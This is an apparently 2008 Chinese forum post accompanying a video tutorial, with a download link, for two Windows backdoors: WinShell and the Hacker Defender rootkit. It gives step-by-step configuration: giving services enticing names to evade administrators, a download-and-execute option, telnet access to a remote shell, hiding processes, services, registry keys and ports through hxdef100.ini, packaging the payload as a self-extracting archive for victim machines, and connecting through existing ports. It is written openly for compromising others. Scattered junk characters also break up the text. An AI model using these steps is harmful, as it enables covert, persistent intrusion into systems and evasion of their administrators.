两款经典的DOS下后门

软件简介：
; V" R2 e( H& h: ~7 X! e大家好，今天给大家做的动画是两款经典DOS下后门的配置和使用。
, B- r: d8 J+ ^7 Y% E1.winshell 很强大的DOS下的后门连接工具
  _  M" N3 [/ b) n2.rootkit 超级隐蔽的DOS下的后门连接工具
㈠winshell
首先我们看如何配置，看程序主界面 ，这就是我们这款用到的工具
port 连接时的端口
password 连接密码
password Banner 欢迎信息
4 S1 i9 Z' S* V2 ~4 ~SVCname 服务名称
DISplayname 显示名称
9 \! h: J$ S* q$ h; o  x) BDescription 服务描述
RegKeyName 注册表名称
DownExec 运行后下载指定文件 与Url Address和Destination Filename 下载地址、程序名对应
Autoinstall 自动安装
Compress WinshellServer 压缩文件
) V! n! s) U3 p/ D* d! Y+ w* E' R好了，说明大家可以下面自己去看，我这里生成一个服务端给大家。服务名称这些我就先不改了，大家可以自己修改，起一些比较有诱惑性的名字，防止让管理员发现。运行后下载程序和压缩，这里我就不选上了，就选择自动安装就可以了，配置完成后，会弹出一个配置的信息。关闭就可以了。OK，我把这个生成的服务端传到虚拟机上，然后我们运行他，在连接
我们运行，OK运行完了，我们用TELNET进行连接。
连接方法：telnet IP 端口，输入密码 192.168.59.128 连接成功，这个时候要立刻输入密码，否者就会自动退出
1 \: z8 A3 f1 S2 F) o! A  i2 J8 o# c，连接成功。我们可以输入？查看这款工具的使用命令
，下面的命令，我都用中文写了翻译。
WinShell v5.0 (C)2002 janker.org
? for help
( z, A' Y4 e6 d4 I( h( A% J0 oCMD?
i Install （远程安装功能，当你仅仅执行winshel而没有安装winshell的时候）
r Remove （远程反安装功能，注意此命令并不终止winshell的运行）即卸载
p Path （查看winshell主程序的路径信息）
# [1 K  R: \0 ub reBoot （重新启动机器） 我就不尝试了，呵呵
: Y7 V5 j! a8 U; C- \d shutDown （关闭机器）
s Shell （执行后你就会看到可爱的C:\，这正是winshell提供的telnet服务功能）
) i+ S6 F( i3 m4 F, E& `, D- ax eXit （退出本次登录会话，注意此命令并不终止winshell的运行）
6 K( D4 q8 }: g  Eq Quit （终止WinShell的运行，注意此命令并不反安装WinShell） 大家可以自己慢慢看
以上是winshell连接后的使用命令，通常我们就是输入S得到CMDSHELL进行操作，相信得到CMDSHELL后，大家都懂得下一步该做什么吧。。。好了，这一款工具就简单的讲到这里，希望大家能灵活运用。有什么不懂的地方，可以来问我，等一下，我接着做下一款工具的使用，是超级具有隐蔽性的工具。。。
9 J* @& P0 @0 G. R6 J/ G3 y6 l
下面我们接着来讲下一款超级强大的工具
㈡rootkit
rootkit这款后门的特点就是比较隐藏,平时不开放任何端口。使用对方正在工作的任何一个端口就可以建立连接。可以隐藏文件的进程、端口、服务名称、注册表键值等。

2 C8 Q; T  C7 o. }5 O+ r/ [hxdef100.exe 是主程序，不要在主机上运行。不然很难卸载。
hxdef100.ini 配置文件
bdcli100.exe 本机连接肉鸡用的程序
$ Q. ]5 j, C% t# l# z# y0 S首先我们打开这款工具的配置文件，我简单的介绍一下其中重要的选项.
5 v! Z' G# v) H  U; a[Hidden Table] ； 要隐藏的列表，支持通配符，比如这里所有以hxdef 开头的都将不在任务管理器及资源
管理器里出现，大家可以自己在这里添加要隐藏的文件，一个一行.
/ C3 _8 @+ ~1 O9 J1 R. f: k我们这里接着上面的winshell来说，当winshell运行后，它会写入注册表，会加载到进程里，并且在服务里面也有，
我们来看一下是不是这样。看，这样如果信心的管理员就会很轻易的发现我们的后门，还有 winshell也会开放端口
% Y4 V. A0 [! \1 u7 X6 {/ @1 `加载到进程当中，大家都看到了吧？ 这样，我们通过我们这款rootkit就可以完全把这些全部隐藏掉
$ x. w. G9 K& x' m- G+ H下面我都是已隐藏winshell为事例进行讲解
% c( i- Q+ C3 k& S. |# ?; g( S通配符的意思就是所有以winshell开头的程序都隐藏
[Root Processes] ；要隐藏的进程，支持通配符,我喜欢用winshell，那就把winshell.exe 加到rcmd.exe ；
9 Z* t2 w, C, J3 F; o下面,这样在进程里就将不会看到winshell.exe

4 j+ n$ d  b/ G$ W3 |4 f/ m[Hidden Services] ；这里是要隐藏的服务，支持通配符，winshell的服务隐藏那就在Defender*下加winshell；
[Hidden RegKeys] ； 隐藏注册表项，我这里是隐藏winshell，那就添
6 ]& X) H3 s0 ]WinShell
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\

! V# b. D. z, P. u这个是我的winshell在注册表里的位置，你可以找到你自己的后门所在注册表的位置，然后复制
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinShell
7 N" Y8 q5 c  F8 p3 J然后在配置里 先添写注册表项的名字，在添路径
! b5 R5 f! P/ O3 A& m[Hidden Ports]；隐藏的端口 winshell连接端口是2007，我们就添2007隐藏这个端口
8 y. v, x5 i1 K' P+ N，这个后面可以添写多个端口，中逗号隔开。。
# b( c# {. b3 w[Settings]
+ ]+ m  \. C. |& ~! |Password=****** ;这里设置连接后门用密码，大家自己改.这样都添写好了，我们就算配置完成了
. S: K: R7 ?# R2 E% b首先在本机设置好hxdef100.ini，然后把hxdef100.exe和hxdef100.ini做成rar格式！再做成自解压格式。hxdef100.exe解压运行此程序.这样在肉鸡上执行这个自解压文件。看下效果。OK 我们运行他，看运行以后，是不是在服务中、注册表中、进程中，都会小时，而且查看端口也没有我们的2007端口呢 好了，运行完了 我们看
$ r  Y% h0 t* T9 Y1 G2 J看刷新过后，注册表里已经没有了吧？我们在看服务，服务里也没有了吧？我们在查看端口 ，看2007也没有， 进程里也没有了！怎么样？？？这款工具很强大吧？ 心动了没？ 最后我们测试一下，虽然这些都隐藏了，但是我们如果用winshell连接不上的话，那这些启不是都白做了？？？ 怎么样？？完全没有问题！ 没问题吧！下面还有一个更强大的功能，这款工具rootkit这款后门的特点就是比较隐藏,平时不开放任何端口。使用对方正在工作的任何一个端口就可以建立连接。
我们可以连接对方开的任何一个端口 比如135 吧 我们试一下

) b3 ?# s( k. h2 r3 y: E  C& X
( N$ L2 Q! L' q6 H7 l) c1 bbdcli100.exe 这个是他的连接工具 我的机器有点卡了。。。
8 S  o: a5 n- c1 z9 h1 M* @连接的命令是：bdcli100.exe IP 端口 密码 等待连接
快吧？？怎么样？ 好了，这款工具真的很强大，更多利用要靠大家自己发挥了，比如建立隐藏帐号，虽然在本地用户和组，还有DOS下都查看不到，但是在注册表里还是可以查看的到！那样我们就可以利用这款工具，把他在注册表里进行隐藏。。。
好了，教程就做到这里。。。如果有什么问题的话，可以加我的群。47688744 前天刚建的。。。有什么问题来这里讨论吧。。。好了，我们下次再见。。。。
下载地址：

2008-8-19 13:44 上传 两款经典的DOS下后门.rar

下载权限:

版本vip会员

本地下载 检测资源   提取码: 需要终身vip或更高权限

有些游戏资源需要vip下载开通请点击开通vip